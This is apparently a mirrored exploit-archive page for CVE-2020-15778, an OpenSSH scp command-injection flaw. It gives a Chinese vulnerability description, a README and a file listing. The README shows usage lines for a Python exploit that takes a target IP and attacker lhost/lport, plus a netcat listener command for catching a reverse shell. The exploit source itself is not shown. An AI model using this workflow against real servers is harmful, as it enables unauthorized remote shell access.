CVE-2020-15778 PoC — OpenSSH 操作系统命令注入漏洞

Source

https://github.com/Neko-chanQwQ/CVE-2020-15778-Exploit

Associated Vulnerability

Title:OpenSSH 操作系统命令注入漏洞 (CVE-2020-15778)
Description:OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中，网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。

Description

Exploit for CVE-2020-15778(OpenSSH vul)

Readme

# CVE-2020-15778-Exploit
## Exploit for CVE-2020-15778(OpenSSH vul)  
Example: python CVE-2020-15778.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234  
You need to use netcat to listen port before use python script  
Example: nc -lvp 1234  
1.Screenshot of using script  
![Alt text](https://github.com/yukiNeko114514/CVE-2020-15778-Exploit/blob/main/img/1.PNG)  
2.Screenshot of get shell  
![Alt text](https://github.com/yukiNeko114514/CVE-2020-15778-Exploit/blob/main/img/2.PNG)  
  
 2021-7-21 Update Log:  
 Use python-nmap to check host status  
 Usage:python3 CVE-2020-15778-Update.py -ip 192.168.11.123 -lhost 192.168.11.124 -lport 1234  
 "pip3 install python-nmap" before you use Update version script  
 XD

File Snapshot


 [4.0K]  /data/pocs/9f77b4717f9d9917ba826ad9aa8af63b4514c8fb
├── [1.6K]  CVE-2020-15778.py
├── [2.0K]  CVE-2020-15778-Update.py
├── [4.0K]  img
│   ├── [ 62K]  1.PNG
│   └── [ 15K]  2.PNG
└── [ 725]  README.md

1 directory, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!